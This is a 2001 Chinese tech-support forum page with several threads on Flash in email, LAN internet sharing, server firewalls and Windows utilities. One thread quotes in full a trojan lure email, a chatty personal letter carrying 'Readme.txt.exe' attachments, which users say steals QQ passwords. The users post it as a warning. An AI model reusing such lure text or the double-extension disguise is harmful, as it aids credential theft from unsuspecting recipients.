你可以将foxmail目录下的你的用户文件夹删除重新建立用户，这样所以的信都变成未读的了，再备份就可以了，如果不行就重装foxmail，但要删干净。

I want to top ......
上一贴 | 下一贴
快速回复 | 主题：有关foxmail的一个问题,大虾们遇到过吗?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直

计算机技术
紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直

上一贴 | 下一贴
发表人 主题: 紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直
arey

高级用户
积分：185
发帖：60
来自：
注册：2001-12-20
 发表于 2001-12-21 14:41:06 按此观看arey的个人资料 按此发邮件给arey arey 的 oicq 是15810000,查看 15810000 的资料 收藏该主题供以后查看 发送悄悄话给arey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arey的IP
我有个flash图片，想把它放在邮件里发给别人，怎么样可以直接显示出来，而不是打开附件？

我是一条美人鱼，游啊游啊游~~~~~~~
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-12-21 16:15:54 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
选择发送html代码
<embed src=swf地址 width=xx height=xx>

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

arey

高级用户
积分：185
发帖：60
来自：
注册：2001-12-20
 发表于 2001-12-21 18:35:39 按此观看arey的个人资料 按此发邮件给arey arey 的 oicq 是15810000,查看 15810000 的资料 发送悄悄话给arey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arey的IP
冷语，麻烦你写的详细点好吗？我问了很多人，他们都没法解决
请看http://www.blueidea.com/bbs/NewsDetail.asp?id=330286

[这消息被arey编辑过(编辑时间2001-12-21 23:48:51)]

我是一条美人鱼，游啊游啊游~~~~~~~
coffeecup

高级用户
积分：262
发帖：69
来自：
注册：2001-12-03
 发表于 2001-12-21 19:12:39 按此观看coffeecup的个人资料 按此发邮件给coffeecup 发送悄悄话给coffeecup 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看coffeecup的IP
arey在上个帖子中说
引用:
冷语，麻烦你写的详细点好吗？我问了很多人，他们都没法解决
请看http://www.blueidea.com/bbs/NewsDetail.asp?id=330286

这活前几天刚做过，虽然信件是可以编辑源码的，不过对展示flash没有，比如你的路径是桌面，可收信人桌面上面没有这个swf，所以他看不到。

我知道的就一个方法，你找个网上空间，在网上做好一个页面，在里面放上你的swf.然后打开新邮件，菜单中“邮件“/“新邮件使用“/"Web页“，弹出窗口输入你做的那个地址，发出去就可以了。当然有一个要求，对方必须在线的情况下打开你的信才能看到。看上去这方法有点傻，给别人一个地址不就结了，不过重要的是别人打开信看到一个动画，而不是写的http...感觉还是不一样的。（另外信里面最好别写自，因为很容易给flash挡住，要不你把flash做的下面点）ok,如果还有另外的方法可以做到被忘了告诉我。也许这是OE7.0要改进的目标，可以让flash和图片一样。

→→Coffee Cup ? nO Coffee CPU ! ←←
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-21 19:19:51 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
很简单！你把flash改为html源代码然后天道信件里面，按html格式发送！

I am a freedog！
arey

高级用户
积分：185
发帖：60
来自：
注册：2001-12-20
 发表于 2001-12-21 23:31:39 按此观看arey的个人资料 按此发邮件给arey arey 的 oicq 是15810000,查看 15810000 的资料 发送悄悄话给arey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arey的IP
coffeecup说得有道理，我试过了，是可以的。谢谢你的帮助！
<embed src=swf地址 width=xx height=xx>这样做我不太明白，能解释一下吗？

[这消息被arey编辑过(编辑时间2001-12-21 23:32:02)]

我是一条美人鱼，游啊游啊游~~~~~~~
上一贴 | 下一贴
快速回复 | 主题：紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


好像是"木马邮件"

计算机技术
好像是"木马邮件"

上一贴 | 下一贴
发表人 主题: 好像是"木马邮件"
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-30 19:18:59 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
下面是我和我的几个同学收到的邮件
完全一样
发件人: haiwa <mail@btamail.net.cn>
收件人: g_op@163.com　　抄送: (无)
发送时间: Sat, 29 Dec 2001 01:35:33 中国标准时间 0800　　优先级: 普通
标题: xue
－－－－－－－－－－－－－－－－－－－－－－－－－－－
小母猫：

哈哈，你还好吗？想不想我呀？

好几天没见你，你怎么样了？是不是工作的事出了点麻烦呢？

你也知道，我也有些忙的，现在学生也放暑假了，就更没有什么空余时间了，可我没时间，你应该有呀，怎么没见你的信？？？

哎，算了，说了也白说，我何必呢？只是关心你现在怎么样了，如果不在网吧做事了，还打算做些什么呢？我想知道。

希望你能过的好，过的开心，大哥也就放心了。

给你发了个小玩意，蛮有意思的，呵呵。

祝一切如意吧~！

你的大哥：张。

暑假了，店里忙，见不了我，实在想我的话可以打电话：013037457789
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
还有两个附件
Readme.txt.exe
Readme.txt.exe
－－－－－－－－－－－－－
大小共有172K
－－－－－－－－－－－－－－－－－－－－－－－－
我觉得这像是个偷QQ密码的木马

我在系统盘上的根目录中发现了一个文件，用记事本打开它，找到了几个文件，里面居然是记录我机子上的QQ密码！
大家要小心呀！
－－－－－－－－－－－－－－－－－－－

[这消息被51windows编辑过(编辑时间2001-12-30 19:25:12)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

火鸟王

终级用户
积分：473
发帖：274
来自：盈动数码
注册：2000-08-22
 发表于 2001-12-30 20:35:50 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP
我也收到了，象这种信件我从不打开。

千淘万漉虽辛苦，吹尽狂沙始到金。
wangfeng

高级用户
积分：280
发帖：91
来自：辽宁
注册：2001-12-23
 发表于 2001-12-30 20:40:17 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
我一个朋友弄过这东西

就是个记录键盘的东西 如果你点击了

从今以后你机器上所有的密码都会发到对方邮箱里

格了或者静像恢复吧 朋友

我曾经问个不休？……？
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-30 22:30:37 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
wangfeng在上个帖子中说
引用:
我一个朋友弄过这东西

就是个记录键盘的东西 如果你点击了

从今以后你机器上所有的密码都会发到对方邮箱里

格了或者静像恢复吧 朋友

把几个文件删除了就行了

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：好像是"木马邮件"
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样实现LAN共享上网

计算机技术
怎样实现LAN共享上网

上一贴 | 下一贴
发表人 | 主题: 怎样实现LAN共享上网
CrazyParty 群山之巅 积分：2164 发帖：811 来自：温州 注册：2000-10-14 | 发表于 2001-12-06 16:49:37 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP 网上都是ADSL方面的，找不到LAN的，请问怎么实现，和ADSL一样吗，用SyGate??? 谢谢！！！ 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-06 17:49:49 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 网络协议设置： 其中一台电脑 选择网上邻居---->右键----〉属性-----〉设置网卡 TCP/IP属性（不要看错了设置了拨号器的TCP/IP属性） IP地址：192.168.0.X （推荐设置为192.168.0.1） 子网掩码 255.255.255.0 另外一台电脑：设置网卡 TCP/IP属性 IP地址：192.168.0.X （推荐设置为192.168.0.2） 子网掩码 255.255.255.0 注意要在网上邻居看到对方需要两台电脑都启用文件和打印机共享 （在网络属性里面有） 工作组(workgroup) 的名字要相同。 如果要两台电脑共享上网的话 拨号的那台电脑修改如下设置：在网络属性里面启用网络共享就行 另外一台 ： 网络属性里面添加如下设置：网关：192.168.0.1（就是另外一台电脑的ip地址）DNS:192.168.0.1（就是另外一台电脑的ip地址）其他不变。 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
cjj31 方与圆 积分：2971 发帖：1044 来自：浙江嘉兴 注册：2000-07-05 | 发表于 2001-12-06 19:39:26 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP 如果装的是98的话,98里有INTERNET共享! 我笨故我菜！ 好好学习，天天向上!
上一贴 | 下一贴
快速回复 | 主题：怎样实现LAN共享上网
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


server应该使用什么防火墙？

计算机技术
server应该使用什么防火墙？

上一贴 | 下一贴
发表人 主题: server应该使用什么防火墙？
闪亮源码

闪亮源码
积分：1680
发帖：889
来自：
注册：2001-02-09
 发表于 2001-12-08 18:00:55 按此观看闪亮源码的个人资料 按此发邮件给闪亮源码 访问闪亮源码的主页 闪亮源码 的 oicq 是534289,查看 534289 的资料 收藏该主题供以后查看 发送悄悄话给闪亮源码 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看闪亮源码的IP
我的系统是windows.net enterprise server 3590
无法安装我最喜欢的NAV2002了
windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-12-08 18:05:07 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
LOCKDOWN

Blueidea Web Team
Moderator Of multimedia forum
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-09 11:47:29 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
你的那个.NET好用吗？是beta3吗？是不是中文的？比2000server有什么大的区别

等我想想再签
闪亮源码

闪亮源码
积分：1680
发帖：889
来自：
注册：2001-02-09
 发表于 2001-12-09 18:00:03 按此观看闪亮源码的个人资料 按此发邮件给闪亮源码 访问闪亮源码的主页 闪亮源码 的 oicq 是534289,查看 534289 的资料 发送悄悄话给闪亮源码 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看闪亮源码的IP
BIGBUG在上个帖子中说
引用:
你的那个.NET好用吗？是beta3吗？是不是中文的？比2000server有什么大的区别

非常好用
最新的操作系统
比xp更稳定
界面没有xp花巧，比较像2000

[这消息被闪亮源码编辑过(编辑时间2001-12-09 18:52:10)]

Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-12-09 19:22:10 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
.net
应该是3600吧

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

闪亮源码

闪亮源码
积分：1680
发帖：889
来自：
注册：2001-02-09
 发表于 2001-12-09 21:26:54 按此观看闪亮源码的个人资料 按此发邮件给闪亮源码 访问闪亮源码的主页 闪亮源码 的 oicq 是534289,查看 534289 的资料 发送悄悄话给闪亮源码 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看闪亮源码的IP
Fly在上个帖子中说
引用:
.net
应该是3600吧

3590

上一贴 | 下一贴
快速回复 | 主题：server应该使用什么防火墙？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


msconfig、sysconfig等命令

计算机技术
msconfig、sysconfig等命令

上一贴 | 下一贴
发表人 主题: msconfig、sysconfig等命令
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
注册：2001-09-14
 发表于 2001-12-14 11:59:57 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
Windows 2000 Professional，在开始-->运行，输入msconfig、sysconfig等命令，怎么不能执行了？怎么解决？

Sun
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-14 13:44:17 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
去win98下面copy过来用

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

blueonline

Blueonline
积分：815
发帖：1676
来自：blue-online.
注册：2000-12-09
 发表于 2001-12-14 14:45:11 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
http://www.blue-online.net/register/reg_soft.htm

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-14 17:34:19 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
2000下没有，copy 98 的，运行后会报错，不用管它

XP下有MSCONFIG

[这消息被BIGBUG编辑过(编辑时间2001-12-14 17:34:05)]

等我想想再签
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
注册：2001-09-14
 发表于 2001-12-15 09:35:54 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
blueonline在上个帖子中说
引用:
http://www.blue-online.net/register/reg_soft.htm

哪一个啊？

Sun
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-12-15 23:37:43 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
2K有自己的命令，98的老命令在2K里取消了。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
注册：2001-09-14
 发表于 2001-12-17 10:41:30 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
hellslayer在上个帖子中说
引用:
2K有自己的命令，98的老命令在2K里取消了。

请问Windows 2000里是什么命令？

Sun
上一贴 | 下一贴
快速回复 | 主题：msconfig、sysconfig等命令
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


两台计算机，不装网卡，能不能实现共享上网？

计算机技术
两台计算机，不装网卡，能不能实现共享上网？

上一贴 | 下一贴
发表人 主题: 两台计算机，不装网卡，能不能实现共享上网？
QYworld

超级用户
积分：440
发帖：134
来自：北京
注册：2000-12-30
 发表于 2001-12-07 21:18:48 按此观看QYworld的个人资料 按此发邮件给QYworld 访问QYworld的主页 QYworld 的 oicq 是28709006,查看 28709006 的资料 收藏该主题供以后查看 发送悄悄话给QYworld 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QYworld的IP
一条电话线，两台计算机都没有网卡，如何才能同时上网？

一个系统是win2000server，一个是win98

网酷中国
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-07 21:51:08 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
可以，有一种可以直接连接的线卖的，但是长度和速度不如用网卡加网线，速度和长度都要好，价格也并不高，估计100多元

WINDFLASH
::浅紫色FORUM::
lzrone

初级用户
积分：107
发帖：51
来自：
注册：2001-03-18
 发表于 2001-12-08 01:15:14 按此观看lzrone的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给lzrone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lzrone的IP
老兄，别省啦
用那电缆连接很麻烦的，不如买块便宜的网卡既方便又实惠：）

****************************
星空依旧灿烂
灰姑娘1975

终级用户
积分：455
发帖：173
来自：北京
注册：2001-07-02
 发表于 2001-12-08 03:03:24 按此观看灰姑娘1975的个人资料 按此发邮件给灰姑娘1975 灰姑娘1975 的 oicq 是1825520,查看 1825520 的资料 发送悄悄话给灰姑娘1975 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看灰姑娘1975的IP
就是两块网卡才130，我和我妹用一个电话上网，我们都用WINME，用SYGATE，挺快的。

菜鸟一只，拜托拜托！*^_^*
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-08 03:13:21 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
灰姑娘1975在上个帖子中说
引用:
就是两块网卡才130，我和我妹用一个电话上网，我们都用WINME，用SYGATE，挺快的。

直接联就行了，不用sygate更好呀

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

安塞尔亚当斯

初级用户
积分：0
发帖：2
来自：
注册：2001-12-08
 发表于 2001-12-08 15:27:56 按此观看安塞尔亚当斯的个人资料 按此发邮件给安塞尔亚当斯 安塞尔亚当斯 的 oicq 是35036566,查看 35036566 的资料 发送悄悄话给安塞尔亚当斯 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看安塞尔亚当斯的IP
当然可以
方法2两种。一：一根com对com的线，电脑城到处有！
二：微星主板特有的PC2PC功能（利用主板USB）

Adama是f/64小组的主要发起人之一。我认为，一幅作品能否成功，拍摄，显影与制作是三个关键。是深刻的创作意图与高超的制作技术结合在一起的结果。从我的作品中我们可以看出，从前景至后景都极其清晰，影调层次，从黑，深灰，中灰，浅灰到白，显得极为丰富而分明。
风云突变

终级用户
积分：637
发帖：141
来自：风云工作室
注册：2001-12-01
 发表于 2001-12-08 15:44:14 按此观看风云突变的个人资料 按此发邮件给风云突变 风云突变 的 oicq 是5477342,查看 5477342 的资料 发送悄悄话给风云突变 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风云突变的IP
用 USB 联网线不错

N神
自由光束

终级用户
积分：936
发帖：291
来自：中国·哈尔滨
注册：2000-12-09
 发表于 2001-12-08 22:01:01 按此观看自由光束的个人资料 按此发邮件给自由光束 访问自由光束的主页 自由光束 的 oicq 是2905924,查看 2905924 的资料 发送悄悄话给自由光束 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自由光束的IP
如果你两台机器有usb接口就用usb速度顶快的，如果没有，只好用com连线了！

人活着就应该有梦想，如果人活着没有梦想，那和咸鱼有什么区别？
个人主页： http://sunber.home.sohu.com
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-08 22:07:32 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
风云突变在上个帖子中说
引用:
用 USB 联网线不错

有些主板支持通过usb线直接连接如微星815ep 之类 不支持的通过usb连接要一根特殊的usb连线带驱动 这个线也要100多元~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

风云突变

终级用户
积分：637
发帖：141
来自：风云工作室
注册：2001-12-01
 发表于 2001-12-09 00:00:36 按此观看风云突变的个人资料 按此发邮件给风云突变 风云突变 的 oicq 是5477342,查看 5477342 的资料 发送悄悄话给风云突变 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风云突变的IP
是啊，USB的线是满贵的，不过用过来比网卡方便

N神
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-12-09 16:15:38 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
说到后来还不是使用网卡最方便，而且又不贵！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
上一贴 | 下一贴
快速回复 | 主题：两台计算机，不装网卡，能不能实现共享上网？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎么在WIN2000下查找网卡的物理地址

计算机技术
怎么在WIN2000下查找网卡的物理地址

上一贴 | 下一贴
发表人 | 主题: 怎么在WIN2000下查找网卡的物理地址
踏笑2000 gleam 积分：543 发帖：260 来自：苏州 注册：2000-07-01 | 发表于 2001-12-06 11:05:20 按此观看踏笑2000的个人资料 按此发邮件给踏笑2000 踏笑2000 的 oicq 是16080407,查看 16080407 的资料 收藏该主题供以后查看 发送悄悄话给踏笑2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看踏笑2000的IP ipconfig /all 用这个命令的时候，一闪而过！ 行尽水穷处，坐看云起时！
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-06 11:35:44 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 运行 command 在这个窗口里面再运行你的命令 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：怎么在WIN2000下查找网卡的物理地址
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


为什么家庭两机共享总是设置不好

计算机技术
为什么家庭两机共享总是设置不好

上一贴 | 下一贴
发表人 | 主题: 为什么家庭两机共享总是设置不好
追风男孩Kevin 初级用户 积分：0 发帖：2 来自：太平洋西海岸 注册：2001-12-10 | 发表于 2001-12-10 08:51:56 按此观看追风男孩Kevin的个人资料 按此发邮件给追风男孩Kevin 追风男孩Kevin 的 oicq 是48780950,查看 48780950 的资料 收藏该主题供以后查看 发送悄悄话给追风男孩Kevin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看追风男孩Kevin的IP 我家有两台电脑，进行了联机尝试！现在网关已经设置好了，双方也能访问机器（可联机）问题出现：一猫不能共享上网？（工作组相同） 首先协议设置：Internet/netbeuI/tcpip 其中一台机器设置为主机，另一台设访问机，Internet连接共享设好 ！ 不知道还有什么疏忽之处，希望大家帮忙解决！万分感谢！！ 我不完美，可是我很自信。我不英俊，可是我很潇洒； 我不富有，可是我很快乐，我不成功，可是我很认真； 我不多情，可是我懂得珍惜。这就是我，一个快活的人。
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-10 09:13:19 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 网络协议设置： 其中一台电脑 选择网上邻居---->右键----〉属性-----〉设置网卡 TCP/IP属性（不要看错了设置了拨号器的TCP/IP属性） IP地址：192.168.0.X （推荐设置为192.168.0.1） 子网掩码 255.255.255.0 另外一台电脑：设置网卡 TCP/IP属性 IP地址：192.168.0.X （推荐设置为192.168.0.2） 子网掩码 255.255.255.0 注意要在网上邻居看到对方需要两台电脑都启用文件和打印机共享 （在网络属性里面有） 工作组(workgroup) 的名字要相同。 如果要两台电脑共享上网的话 拨号的那台电脑修改如下设置：在网络属性里面启用网络共享就行 另外一台 ： 网络属性里面添加如下设置：网关：192.168.0.1（就是另外一台电脑的ip地址）DNS:192.168.0.1（就是另外一台电脑的ip地址）其他不变。 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
